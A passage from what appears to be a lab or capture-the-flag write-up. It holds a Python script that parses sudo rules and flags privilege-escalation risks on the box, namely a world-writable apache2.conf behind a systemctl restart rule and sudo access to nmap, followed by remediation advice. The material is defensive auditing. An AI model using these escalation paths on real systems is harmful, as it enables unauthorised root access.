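            rules.append(Rule(m.group("runas"), "NOPASSWD:" in m.group("tags"), m.group("cmd").strip()))
    return rules


def world_writable(path: str) -> bool:
    """True when the 'other' write bit is set, as on the box's apache2.conf (0777)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False


def audit(rules: List[Rule], service_config: Dict[str, List[str]]) -> List[str]:
    """service_config maps a unit name to the files that decide which user it runs as."""
    findings: List[str] = []
    for rule in rules:
        argv = rule.command.split()
        binary = os.path.basename(argv[0])
        if binary in SHELL_CAPABLE and len(argv) == 1:
            findings.append(f"{rule.command} as {rule.runas}: unrestricted arguments on a shell-capable binary")
        if binary == "systemctl" and len(argv) >= 3 and argv[1] in ("start", "restart"):
            for cfg in service_config.get(argv[2], []):
                if world_writable(cfg):
                    findings.append(f"{rule.command} as {rule.runas}: {cfg} is world-writable, "
                                    f"so the unit can be restarted under any User/Group")
    return findings


def run_demo() -> Tuple[List[str], List[str]]:
    """Mirror the box on temporary files (apache2.conf 0777, envvars 0644) and audit both users."""
    with tempfile.TemporaryDirectory() as d:
        conf, envvars = os.path.join(d, "apache2.conf"), os.path.join(d, "envvars")
        for path, mode in ((conf, 0o777), (envvars, 0o644)):
            open(path, "w").close()
            os.chmod(path, mode)
        cfg = {"apache2": [conf, envvars]}
        return audit(parse_sudo_l(WWW_DATA_SUDO_L), cfg), audit(parse_sudo_l(MAHAKAL_SUDO_L), cfg)


if __name__ == "__main__":
    for user, findings in zip(("www-data", "mahakal"), run_demo()):
        for finding in findings:
            print(f"[{user}] {finding}")
```

The www-data rules produce two findings (start and restart, each pointing at the writable apache2.conf) and the mahakal rule produces one. The remediation follows directly from them: apache2.conf and envvars back to root:root 0644, the service-control rules removed or replaced with a unit that does not read a user-writable config, and the nmap rule dropped altogether, since there is no argument restriction that makes sudo nmap safe.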